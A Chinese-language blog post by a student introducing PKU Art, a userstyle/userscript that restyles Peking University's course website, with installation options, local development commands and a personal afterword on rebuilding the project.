  • 本脚本除了内置库外,需要安装 openpyxl 库来读写 xlsx 文件,如果你在运行过程中报错没有此库,可以在终端 / Windows Terminal 中使用 pip3 install openpyxl 来安装。
  • 关于如何将 csv 文件导入到 Wakeup 课程表中,可以参见 Wakeup 课程表的 官方教程
  • 笔者发现门户上的课表与班群里的课表实际上有一些出入,并不完全相同,但我认为这是教务的问题,所以也提醒下各位记得检查一下,根据实际情况修改。
  • 如果有任何问题,欢迎与笔者联系,或在本文下留言。

💾

PKU Art

2023年9月2日 19:33

作为一名 PKUer,我从入学伊始就对教学网的样式适应不来,这做的真的太丑了!这怎么会让人有学习的动力呢?!我为什么老摸鱼?不就是因为这教学网让我看了就不想学习吗!(震声

这种不满终于入学考完第一个期中后的某个周四爆发了。我看着又土又老的编程网格,再也忍不下去了,正好周五加周末没啥事,于是开始快乐地在图书馆摸鱼(其实只有最后看到成果的时候才快乐,期间调各种样式啊选择器啊的时候让我简直要吐血,好多知识和语法还是边用边学的),爆肝出了编程网格、IAAA 登录页、教学网大部分页面的 CSS。

我真的很想吐槽那用 Table 搭出来的编程网格、大黑框顶头上的教学网,还有那设计简直离天下之大谱、让我甚至真的想问“就这还注册专利吗?”的成绩页面(它居然还用 iframe 套娃套了两层!),但最终,我还是完成了这个略显稚嫩的作品。而这,就是 PKU Art 的诞生了。

现在想想,两三天的时间换未来几年的视觉快感,也算是值辽!

效果

IAAA 登录界面

课程网首页

作业上传界面

课程成绩页面

课程公告页面

课程作业复核页面

课程教学内容页面

全局通知页面

全局成绩页面

全局公告页面

全局课程成绩页面

简介

PKU Art 是一款通过浏览器插件向页面附加的 CSS 样式表 / JavaScript 脚本。它可以完成对于原有样式的覆盖,从而增强教学网视觉体验。

PKU Art 第一版发布于 2021 年 11 月,相对简陋;2022 年暑假更新的第二版实现了对第一版完整重构,完美支持了暗色模式,并且增加了更多的交互动效和设计改进。

下载安装

PKU Art 目前支持 CSS 安装与 JavaScript 安装两种安装方式,兼容 Safari 与 Chrome(Edge/Arc) 两大浏览器。两种安装方式都需要借助浏览器插件,同时,JavaScript 安装会包含一些 CSS 无法实现的功能(如首页自动隐去课程号等),所以建议大家选择 JavaScript 安装方式。

GreasyFork:以 JavaScript 方式安装。

Chrome/Edge/Arc 需安装浏览器插件 TamperMonkey

Safari 需安装浏览器插件 UserScripts

Stylish:以 CSS 方式安装。

Chrome/Edge/Arc 需安装浏览器插件 xStyle/Stylish

Safari 需安装浏览器插件 Cascadea(售价 18¥)

CDN for JavaScript:同 GreasyFork。

CDN for CSS:同 Stylish。

Github Release:供备份、发布之用。

更详细的安装指导,请参考文档:PKU Art - Arthals' Docs

使用须知

本样式移除了一些我觉得没有用处的控件元素,如侧栏的收起框(这个太丑了),播放列表上方的导航栏(下方有一样的),这可能会导致一些特殊情况下,某些功能不可用(如侧边栏收起后,在样式启用的状态下,现在无法重新展开侧边栏)。但你可以 随时在插件内禁用本样式 ,以恢复到原有界面。

本样式覆盖了所有我认为常用的界面,但我毕竟不是教学网的专业前端维护人员,所以我并不能做到对全部的页面加以修改。但如果你认为某个页面十分常用但却没有被修改,欢迎联系我,在 Github 提 issue,在树洞#3918083下留言,抑或是直接加我微信的方式(zhuozhiyongde)都可以。

如果你喜欢这个样式,请不要吝啬点击 Star(树洞和 Github 的都可以!),这是对我最大的鼓励与肯定!

开发

项目地址

https://github.com/zhuozhiyongde/PKU-Art

本地开发

  • 克隆本项目:

    git clone git@github.com:zhuozhiyongde/PKU-Art.git
    
  • 进入工作目录后安装依赖:

    npm install
    
  • 启动 Vite 服务器以获得 HMR 热更新开发体验:

    npm run dev
    
  • 编译,随后在本地预览:

    npm run build
    

    注:你需要首先将 update-cdn-sample.py 重命名为 update-cdn.py

  • 而后,你就可以发起 Pull Request,我将在审核代码后更新 CDN。

更新日志

参见 ChangeLog.md

TO-DO

参见 Agenda.md

Q&A

有适配手机版的打算吗?

没有,做手机版自适应工程量几乎等于重构,一个人维护这个项目,我真的太累了 qwq...

可以在 iPad 上使用吗?

可以,方式等同于在 Safari 上使用 JavaScript 安装。

我可以审阅代码、提交 PR 吗?

十分欢迎!你可以随时访问我的 Github,哪里有本项目用到的所有代码。我可以保证项目内不含有任何恶意代码,仅仅是通过附加 css(通过 CDN 分发)来改变页面样式。如果你愿意提交 PR,那我会十分乐意接受的!

后记

平日里的我并非是个话很多的人,但这堪称疯狂的一周,实在是让我感触颇丰,总觉得还是得记下点什么。

去年刚刚进入燕园的我,因为受不了编程网格的老土设计,在图书馆摸了好半天,就为了把编程网格做的好看了一点(树洞#2908869),彼时的我甚至连 CSS 的容器布局都不甚了解,好多知识都是在敲代码的过程中才去第一次认真学习,可我没想到的是哪个略显粗糙的拙劣样式,却得到了很多同学的肯定。于是我再接再厉,凭借着那三脚猫的功夫,滥用各种现在看起来简直不可接受的语句完成了对于教学网的美化(也正是这烂到几乎不可维护的屎山让我下定决心重构整个项目),发布了 PKU Art v1。承蒙厚爱,发布以后我得到了很多同学的赞扬,收获了至今为止 Star 最多的一个树洞&项目。那段时间我最快乐的一件事情就是每天刷树洞看看涨了多少关注,在 Stylish 上看看涨了多少下载(好虚荣啊 hhh),真是相当感谢大家的支持!

开心过后的我,却也从未忘记,那只是一个徒有其表的半成品,根本经不起哪怕一次 Code Review。事实上,自从发布以后,我自己也就是用着,而并没有想办法去优化。毕竟程序员们不总是有句老话嘛——代码能跑就不要动。就这么凑合着,我搁置了这个项目。

时光转眼来到今年的八月一日。对前端一直很感兴趣的我,在七月份刚刚系统化学了一遍 JavaScript,Vue,React 等前端常用技术,也对 CSS 有了一些新的了解。就如同去年的我一样,闲到不知道干什么的我,终于还是给自己找起了事情做——我要重构这一坨屎山代码!

重构的过程,用到的知识其实相较第一版并没有太大的差异,但有了系统化知识的打底,我对于页面结构有了更深的理解,没有再滥用万能的 translate,也没有随意乱加伪类,而是顺着原有的结构一步步选择适合的语句去实现我想要的效果。同时,一回生二回熟的我,也对教学网的路由和套娃谙熟于心,没有再像之前一样对着一个 iframe 愣半天,也通过正则表达式对于样式生效的网址有了更精细的控制。

要说这一周真的学到了什么,我想,也没有什么。抠细节带来的大概只有对于耐心的考验,每个页面,我大概都要写数个小时才能满意,每个用到颜色的地方我都使用了变量来保证在黑暗模式下的可用性,每个我觉得原先图标不行的地方我都专门去 IconPark 网站上找了替代品并加以更换。Mac 告诉我,为了完成这个项目,我的相关屏幕使用时间在上周达到了 50 个小时,然而这还不算我找参考,挑配色的时间。

我向来是一个对于自己感兴趣的事物会不惜代价去投入的人,可是这次所花费的时间和最终写出的代码行数都远远超出了我最开始的预期。

期间,我也不是没有心生厌倦,我曾问过自己,就算花了这么久时间去写,最后能用上的又有多少人?我付出的时间精力难道不是自娱自乐吗?万一教学网也像编程网格一样更新了样式怎么办?... 但我却总是安慰自己,已经写了这么多了(沉没价值啊啊啊啊),怎么能忍心半途而废呢?于是,就在这种一边否定自己,一边问怀疑原有代码究竟是怎么写出来的,一边机械化的敲着已经用了数百遍的那些属性和变量的过程中,我还是渐渐磨出来了最终的成果——全新的、带黑暗模式的 PKU Art v2。

于是,我终于相信,这一版的 PKU Art v2,足够让我、让大家满意。

至此,教学网的页面设计问题终于被我解决,我预想的下一步是,通过新学到的 js 知识,解决一些功能交互方面的问题。譬如说期末考试前大预习的晚上发现下载教学网视频多有不便(不能批量下载、有这奇怪的 source 命名难以查找等…)除了教学网之外,常年闲逛于树洞的我更是从同学们的评论中找到了各种痛点:收藏夹无法导出、无法批量取关…(我也一直很想给树洞加一个限时功能来限制自己的摸鱼 hhh

我希望能够在接下来的暑假,除了学一学先修课之外,再为自己找点事情做——那就是,完成一个 PKU Tool 脚本/网站,尝试解决上述所有提出的问题!虽然能完成多少、要花多长时间完成都是一个未知数,但是我会尽力去做,就像去年年末那个成天在图书馆摸鱼 PKU Art 的我一样 hhh。

💾

❌